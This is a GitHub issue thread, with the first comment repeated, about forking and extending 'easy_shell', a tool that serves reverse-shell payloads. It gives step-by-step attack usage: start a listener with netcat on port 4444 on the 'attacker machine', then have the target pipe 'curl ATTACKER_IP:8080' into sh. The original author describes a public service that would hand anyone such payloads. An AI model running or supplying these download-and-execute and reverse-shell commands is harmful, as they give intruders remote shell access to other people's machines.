You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hey. I've been working on the code you committed and came up with a few modifications. It's still in its initial stages but I've added some functionality as well as a different architecture. Have a look here:
It's quite different from your code already so I didn't want to make a PR right now. The use is similar to yours:
Start the server on the attacker machine. The default interface is 'eth0'. Change it with the '-i' option (check easy_shell.py -h) python3 easy_shell.py
Start Netcat on the attacker machine. The port is hardcoded as 4444 for now: nc -lvp 4444
From the target machine: curl ATTACKER_IP:8080 | sh
That's it. I intend to completely eliminate the necessity of running netcat to make the use even easier. Tell me what you think.
The text was updated successfully, but these errors were encountered:
This looks nice. However, the original idea is to have a web server in which anyone in the world can query it to easily get reverse shell payloads. I have plans to use a VPS to host this service. In this way, you could query curl myserver.sh/your_ip:port | sh on the target without the necessity of using this script on your host (just nc).
Right. I'll stick with this fork then and make this tool generate the payloads, automatically execute them and provide the shell prompt itself. I'll probably also change the name to autoshell.py or something similar while keeping the attribution per the licensing terms.
Hey. I've been working on the code you committed and came up with a few modifications. It's still in its initial stages but I've added some functionality as well as a different architecture. Have a look here:
https://github.com/EONRaider/easy-shell/blob/main/easy_shell.py
It's quite different from your code already so I didn't want to make a PR right now. The use is similar to yours:
Start the server on the attacker machine. The default interface is 'eth0'. Change it with the '-i' option (check easy_shell.py -h)
python3 easy_shell.py
Start Netcat on the attacker machine. The port is hardcoded as 4444 for now:
nc -lvp 4444
From the target machine:
curl ATTACKER_IP:8080 | sh
That's it. I intend to completely eliminate the necessity of running netcat to make the use even easier. Tell me what you think.
The text was updated successfully, but these errors were encountered: